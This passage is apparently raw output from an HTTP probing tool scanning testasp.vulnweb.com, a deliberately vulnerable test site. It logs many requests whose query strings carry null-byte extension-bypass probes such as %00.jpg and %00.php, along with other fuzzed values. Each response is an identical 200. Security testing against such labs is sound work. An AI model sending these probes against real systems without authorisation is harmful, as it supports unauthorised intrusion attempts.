Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:37.955232575Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,939,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,939,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,939,0,active\",\"time\":\"352.393315ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:38.019996427Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,943,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,943,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,943,0,active\",\"time\":\"348.605111ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:38.091654342Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,947,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,947,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,947,0,active\",\"time\":\"354.278147ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:47.371664937Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,951,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,951,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,951,0,active\",\"time\":\"344.412948ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:47.399531881Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,955,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,955,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,955,0,active\",\"time\":\"340.109335ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:47.402240603Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,959,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,959,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,959,0,active\",\"time\":\"341.884405ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:47.419835015Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,963,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,963,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,963,0,active\",\"time\":\"344.39086ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:47.431945059Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,967,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,967,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,967,0,active\",\"time\":\"344.284609ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:47.438736734Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,971,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,971,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,971,0,active\",\"time\":\"351.056511ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:47.44410436Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,975,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,975,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,975,0,active\",\"time\":\"356.728634ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:47.462040322Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,979,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,979,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,979,0,active\",\"time\":\"354.788522ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:47.469882225Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,983,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,983,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,983,0,active\",\"time\":\"350.689431ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:47.477123339Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,995,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,995,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,995,0,active\",\"time\":\"343.418329ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:47.477199278Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,987,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,987,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,987,0,active\",\"time\":\"351.779102ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:47.480222902Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,991,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,991,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,991,0,active\",\"time\":\"355.193797ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:47.498702162Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg?id_menu=362\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg?id_menu=362\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg?id_menu=362\",\"time\":\"348.305891ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:47.502428544Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,999,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,999,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,999,0,active\",\"time\":\"356.577743ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:47.502534121Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg:c4ca4238a0b923820dcc509a6f75849b\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg:c4ca4238a0b923820dcc509a6f75849b\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg:c4ca4238a0b923820dcc509a6f75849b\",\"time\":\"356.583415ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:47.739919248Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.php?bo_table%3Dstep_chinese%26wr_id%3D3\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.php?bo_table%3Dstep_chinese%26wr_id%3D3\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.php?bo_table%3Dstep_chinese%26wr_id%3D3\",\"time\":\"347.959188ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:47.801546209Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.php?bo_table=co_notice\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.php?bo_table=co_notice\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.php?bo_table=co_notice\",\"time\":\"343.088052ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:47.86889619Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.tst\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.tst\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.tst\",\"time\":\"347.851055ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:47.89571392Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.tst%5Eaatppmlx%5E1829\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.tst%5Eaatppmlx%5E1829\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.tst%5Eaatppmlx%5E1829\",\"time\":\"343.77232ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:47.895788151Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.tst%5E%5EacUn3t1x%5E1\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.tst%5E%5EacUn3t1x%5E1\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.tst%5E%5EacUn3t1x%5E1\",\"time\":\"343.800655ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:48.002307849Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.tst%5Einvaoqxg%5E751\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.tst%5Einvaoqxg%5E751\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.tst%5Einvaoqxg%5E751\",\"time\":\"344.359718ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:48.169435165Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.tst%5Eosfgeuck%5E1171\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.tst%5Eosfgeuck%5E1171\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.tst%5Eosfgeuck%5E1171\",\"time\":\"351.963197ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:48.237824568Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00///////$1$a8KeoVwE$BmkdAE//fc1YwY2Hsijp01\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00///////$1$a8KeoVwE$BmkdAE//fc1YwY2Hsijp01\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00///////$1$a8KeoVwE$BmkdAE//fc1YwY2Hsijp01\",\"time\":\"348.598074ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:48.237855839Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00///////$1$.Ftd7V3m$sCFHJkxWGrM6dqgrHNHWh/\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00///////$1$.Ftd7V3m$sCFHJkxWGrM6dqgrHNHWh/\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00///////$1$.Ftd7V3m$sCFHJkxWGrM6dqgrHNHWh/\",\"time\":\"347.908602ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:48.2425972Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.tst%5Exmpvdgko%5E1508\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.tst%5Exmpvdgko%5E1508\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.tst%5Exmpvdgko%5E1508\",\"time\":\"356.385407ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:48.248384213Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%5E2214\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%5E2214\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%5E2214\",\"time\":\"348.13957ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:48.26400762Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%5E3166\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%5E3166\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%5E3166\",\"time\":\"344.678455ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:48.30970421Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%5Ebvvueqmj%5E3144\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%5Ebvvueqmj%5E3144\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%5Ebvvueqmj%5E3144\",\"time\":\"352.15279ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:48.373829264Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%5Eituophhk%5E4401\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%5Eituophhk%5E4401\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%5Eituophhk%5E4401\",\"time\":\"351.709665ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:48.450051708Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%5Enlrriyfb%5E1061\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%5Enlrriyfb%5E1061\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%5Enlrriyfb%5E1061\",\"time\":\"355.925014ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:57.718507701Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%5Esample@email.tst\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%5Esample@email.tst\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%5Esample@email.tst\",\"time\":\"344.788224ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:57.75368894Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%5Eywvuqqhl%5E2189\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%5Eywvuqqhl%5E2189\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%5Eywvuqqhl%5E2189\",\"time\":\"352.358245ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:57.755593751Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%EF%BF%BD%EF%BF%BD.11\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%EF%BF%BD%EF%BF%BD.11\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%EF%BF%BD%EF%BF%BD.11\",\"time\":\"352.122081ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:57.770331674Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?,0,1,Canada,3137\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?,0,1,Canada,3137\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?,0,1,Canada,3137\",\"time\":\"347.779151ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows 